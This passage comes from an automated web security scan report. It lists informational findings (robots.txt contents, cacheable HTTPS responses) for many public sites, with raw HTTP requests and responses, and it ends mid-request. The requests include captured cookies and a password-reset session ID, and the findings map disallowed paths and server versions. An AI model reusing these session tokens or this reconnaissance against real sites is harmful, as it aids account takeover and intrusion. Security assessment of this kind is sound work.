Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frontier.com

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: text/plain
Last-Modified: Sun, 25 Apr 2010 04:41:04 GMT
Accept-Ranges: bytes
ETag: "4140a18331e4ca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:29:54 GMT
Connection: close

User-agent: *
Disallow: /frontierusage/
Allow: /


22.88. https://www.frontier.com/AgentOrdering/Login/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frontier.com

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: text/plain
Last-Modified: Sun, 25 Apr 2010 04:41:04 GMT
Accept-Ranges: bytes
ETag: "4140a18331e4ca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:27:16 GMT
Connection: close

User-agent: *
Disallow: /frontierusage/
Allow: /


22.89. http://www.google-analytics.com/siteopt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /siteopt.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 06 Sep 2011 11:52:02 GMT
Expires: Tue, 06 Sep 2011 11:52:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

22.90. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Tue, 06 Sep 2011 11:50:38 GMT
Expires: Tue, 06 Sep 2011 11:50:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.91. http://www.myfitv.com/portal/recent_tv_elastic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /portal/recent_tv_elastic

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfitv.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:29:52 GMT
ETag: "3efa1-cc-4813dbc3dd680"
Last-Modified: Sun, 07 Mar 2010 22:47:38 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Content-Length: 204
Connection: Close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

22.92. http://www.ooma.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ooma.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "110030-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 11:52:04 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

22.93. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.optionshouse.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:04 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 98
Last-Modified: Fri, 02 Sep 2011 00:23:30 GMT

User-agent: *
Sitemap: http://www.optionshouse.com/sitemap.xml
Disallow: /pleaseUpgradeYourBrowser

22.94. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /.element/ssi/ads/2.0/gdyn_pgatour.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pgatour.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:28 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 327
Content-Type: text/plain
Connection: close

User-Agent: *
Disallow: /.dev
Disallow: /.element
Disallow: /microsites
Disallow: /live-video/demo
Disallow: /pgatour_adspaces
Disallow: /tmp
Disallow: /video/video
Disallow: /video/audio
Dis
...[SNIP]...

22.95. https://www.usps.com/tools/domesticratecalc/welcome.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /tools/domesticratecalc/welcome.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usps.com

Response

HTTP/1.0 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/plain
ETag: "5f1c9daa-15c4-0-22"
Last-Modified: Mon, 15 Aug 2011 19:53:03 GMT
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:06 GMT
Content-Length: 34
Connection: close

User-agent: *
Disallow: /judicial/

22.96. http://www.vonage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:08 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 14:14:58 GMT
ETag: "6c8617-283-4930d08c79c80"
Accept-Ranges: bytes
Content-Length: 643
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /emails/lnp1/1/
Disallow: /emails/lnp1/2/
Disallow: /emails/lnp1/3/
Disallow: /emails/lnp1/4/
Disallow: /emails/lnp1/5/
Disallow: /emails/lnp1/6/
Disallow: /emails/lnp1/
...[SNIP]...

22.97. http://www.whitefence.com/category/home-phone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whitefence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:57 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 11:51:57 GMT
Last-Modified: Thu, 21 Apr 2011 19:12:05 GMT
ETag: "199a45-6e-4db08185"
Accept-Ranges: bytes
Content-Length: 110
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /test/
Disallow: /common/
Disallow: /objects/
Disallow: /scripts/
Disallow: /static/


22.98. http://www.zillow.com/app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /app

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 12:45:20 GMT
ETag: W/"987-1314817478000"
Last-Modified: Wed, 31 Aug 2011 19:04:38 GMT
Content-Type: text/plain
Content-Length: 987
X-Cnection: close
Via: 1.0 www.zillow.com
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=245
Connection: close

# Access to and use of Zillow.com is governed by our Terms of Use. See http://www.zillow.com/corp/Terms.htm

User-agent: *
Disallow: /claiming/
Disallow: /contact/
Disallow: /corp/Terms.htm
Disallow:
...[SNIP]...

22.99. http://www2.whitefence.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.whitefence.com
Path:   /a

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.whitefence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:02:32 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 12:02:32 GMT
Last-Modified: Thu, 25 Sep 2008 22:17:10 GMT
ETag: "c890d-203-48dc0de6"
Accept-Ranges: bytes
Content-Length: 515
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: loginFailed.html
Disallow: /images/
Disallow: /demo/
Disallow: /demo/
Disallow: /nano/
Disallow: /natgascalc/
Disallow: /electric-calculator/
Disallow: /aff/affiliate-b
...[SNIP]...

22.100. http://xfinity.comcast.net/js-api/compressed/xpbar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfinity.comcast.net
Path:   /js-api/compressed/xpbar.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: xfinity.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 12:22:13 GMT
Cache-Control: max-age=300
Content-Type: text/plain
Content-Length: 394
X-Pad: avoid browser bug
Date: Tue, 06 Sep 2011 12:22:13 GMT
Connection: close

# robots.txt for comcast.net :: akamai version

User-agent: *
Disallow: /user/authkey/
Disallow: */data/*
Disallow: /beta/
Disallow: /mycomcast/
Disallow: /b/
Disallow: /c/
Disallow: /d/
Disallow: /e/
...[SNIP]...

23. Cacheable HTTPS response  previous  next
There are 32 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


23.1. https://login.comcast.net/myaccount/images/overlay-bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/images/overlay-bg.png

Request

GET /myaccount/images/overlay-bg.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=496
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2792

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

23.2. https://login.comcast.net/myaccount/images/sprites/base.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/base.png

Request

GET /myaccount/images/sprites/base.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:33 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=498
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 14752

.PNG
.
...IHDR...h................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

23.3. https://login.comcast.net/myaccount/images/sprites/gradient.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/gradient.png

Request

GET /myaccount/images/sprites/gradient.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=487
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 5060

.PNG
.
...IHDR..............i.r....tEXtSoftware.Adobe ImageReadyq.e<...yPLTE.........................................................,,,...===............888.........777555......666..."""###%%%)))99
...[SNIP]...

23.4. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/xfinity_sprite.png

Request

GET /myaccount/images/sprites/xfinity_sprite.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=314
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8117

.PNG
.
...IHDR...J...^.............tEXtSoftware.Adobe ImageReadyq.e<....PLTE.$(.&)....MS...700......."&................ &.vy............iii.NS....$)....$(.....!..........wx...................#'....\
...[SNIP]...

23.5. https://login.comcast.net/myaccount/js/additional-methods.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/additional-methods.min.js

Request

GET /myaccount/js/additional-methods.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=498
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8689

/**
* jQuery Validation Plugin 1.8.0
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2011 J..rn Zaefferer

...[SNIP]...

23.6. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/jquery-1.5.2.min.js

Request

GET /myaccount/js/jquery-1.5.2.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 85925

/*!
* jQuery JavaScript Library v1.5.2
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

23.7. https://login.comcast.net/myaccount/js/jquery.validate.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/jquery.validate.min.js

Request

GET /myaccount/js/jquery.validate.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=499
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20943

/**
* jQuery Validation Plugin 1.8.0
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2011 J..rn Zaefferer

...[SNIP]...

23.8. https://login.comcast.net/myaccount/js/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/omniture.js

Request

GET /myaccount/js/omniture.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=494
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 21653

function sTrackSignIn(sPage,sSite,sGuid){ //tracks as a custom link click
   s.linkTrackVars="events,eVar31,eVar32,eVar33,eVar35,eVar36,eVar47,eVar50,prop50";
   s.linkTrackEvents="event28";
   s.events="ev
...[SNIP]...

23.9. https://login.comcast.net/myaccount/js/scripts.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/scripts.min.js

Request

GET /myaccount/js/scripts.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:31:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=495
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2435

function placeFooter(){var C=$("#bd");var E=$("#ft-outer");var A=C.offset().top+C.outerHeight(true);var B=E.outerHeight(true);var D=($(window).height()>(A+B))?"absolute":"static";E.css({position:D})}f
...[SNIP]...

23.10. https://login.frontier.com/webmail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /webmail/

Request

GET /webmail/ HTTP/1.1
Host: login.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:21 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-US">
<head>
<title>Mail :: Welcome to Frontier Mail</title>
<link rel="icon" href="/med
...[SNIP]...

23.11. https://us.etrade.com/e/t/jumppage/viewjumppage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/jumppage/viewjumppage

Request

GET /e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST HTTP/1.1
Host: us.etrade.com
Connection: keep-alive
